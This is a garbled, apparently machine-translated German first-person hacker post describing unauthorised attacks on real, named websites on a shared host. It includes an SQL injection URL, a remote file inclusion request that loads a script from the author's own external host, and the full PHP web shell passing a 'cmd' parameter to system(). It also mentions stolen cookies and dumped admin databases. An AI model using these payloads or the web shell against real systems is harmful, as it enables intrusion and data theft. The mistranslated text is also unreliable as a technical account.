|
Hallo, Sie navenoe denke , es ist ein Witz oder ein Druckfehler.
Gar nicht.
Normalerweise schreiben Hacker Artikel mit Titel "" Wie gefährdet ist ... "
In diesem Artikel werden wir auch Hacking, aber ohne die traditionelle Happy End.
Obwohl man weiß ja nie ...
Einer dieser Tage meine Asya klopft Menschen mit dem Angebot ihm Zugriff auf die gleiche Ressource zu erhalten.
Make me war nichts Besonderes und ich stimmte zu .
Nach der Überprüfung ihnen die URL, sah ich ein wenig von Informationen interessant:
http://www.russianspain.com/phpinfo.php
beziehungsweise:
http://www.russianspain.com/php.ini
Steigen Sie auf der Website, fand ich eine andere Möglichkeit , SQL-Injektion durchzuführen, aber keine Fehlermeldung, und ich beschloss , es zu verlassen für später.
Brechen durch ip - Website, sah ich , dass es mehr als 400 Websites registriert wurde.
Ich beschloss , systematisch durch sie zu sortieren , bis ich einen Buggy finden.
Mehrere Male kam ich über den zweiten Zweig der phpBB - Foren, aber die SQL-Injektion wurde überhaupt geschnitten.
Untermenü Cookies habe ich Zugriff auf das Admin - Panel und sbekapil Basis in der Hoffnung , dass eines der Passwörter zu kommen und ftp.
Sobald ich Advanced Guestbook 2.2 gefangen, um inktsiya das Admin - Arbeit zugreifen, aber für den Zugriff auf und Bearbeiten von Vorlage benötigt mehr gültiger Parameter der Session, also war ich ständig und auf der Login - Seite zu entsorgen.
Es gab ein paar Seiten mit SQL-Injektion, wie zum Beispiel:
http://www.joehenke.com/gallery_view.php?galleryid=16+UNION+SELECT+1/*
sondern ziehen aus ihnen etwas Sinnvolles ich einmal gescheitert.
Das dauerte bis , bis ich kam über up-glass.com, Standort von "Unipack" Unternehmen , die Verpackungen für die Alkoholindustrie in Russland produziert.
Sehen , dass die Dateien inkluda, habe ich versucht, die Shell narod.ru zu verbinden:
http://up-glass.com/former.php?folder=http://durito.narod.ru/sh&cmd=ls
Der Server gibt eine Fehlermeldung aus :
Achtung: lmenu (): php_network_getaddresses: getaddrinfo failed: Temporärer Fehler bei der Namensauflösung in /home/upglass/public_html/func.php on line 40
Achtung: lmenu (http://durito.narod.ru/sh/config.p): failed to open stream: Erfolg in /home/upglass/public_html/func.php on line 40
Alles wurde auf einmal klar, ich goß in Ihrer Website config.p Datei mit folgendem Inhalt schnell:
<?
echo "<DIV align = left> <PRE>";
System ($ _ GET [ 'cmd ']);
echo "</ PRE> </ DIV>";
?>
und die folgende Abfrage:
http://up-glass.com/former.php?folder=http://durito.narod.ru/&cmd=ls
gab mir bereits eine Liste von Site - Dateien
Aber ich konnte die Verzeichnisse anderer Nutzer nicht sehen, auch war public_html mir nicht zur Verfügung.
Der Kern war frisch:
Linux cpanel05.gzo.com 2.6.11.11 # 1 SMP Di 31. Mai 14.02.19 CDT 2005 i686 i686 i386 GNU / Linux
in der Rue könnte vergessen.
Dann entschied ich mich bei www.russianspain.com an die SQL-Injektion zu gehen.
Erst jetzt warf beiläufig Blick auf die Website - Content.
Ich sah , dass vzlyad Schöpfer der Website in Bezug auf den russischen Präsidenten und seine Politik sind sehr nah an mir.
Nach dem Lesen des Artikels, war ich einer der letzten freien Stimmen der Opposition allein zu lassen bestimmt.
Außerdem schrieb ich über die Schwachstellen auf der Website zu ihnen und fragte ein Banner zu hängen "Stop Putin!".
Das ist die Geschichte.
Ihr Fehler Durito.
_________________
ESSEN SIE DIE REICHEN!
| 
Kommentare
Kommentar nicht vergessen , dass der Inhalt und der Ton Ihrer Nachrichten , die Gefühle von echten Menschen verletzen können, Respekt und Toleranz gegenüber seinen Gesprächspartnern, auch wenn Sie Ihr Verhalten in Bezug auf die Meinungsfreiheit ihre Meinung nicht teilen, und die Anonymität des Internets, ändert sich nicht nur virtuell, sondern realen Welt. Alle Kommentare werden aus dem Index, Spam - Kontrolle versteckt.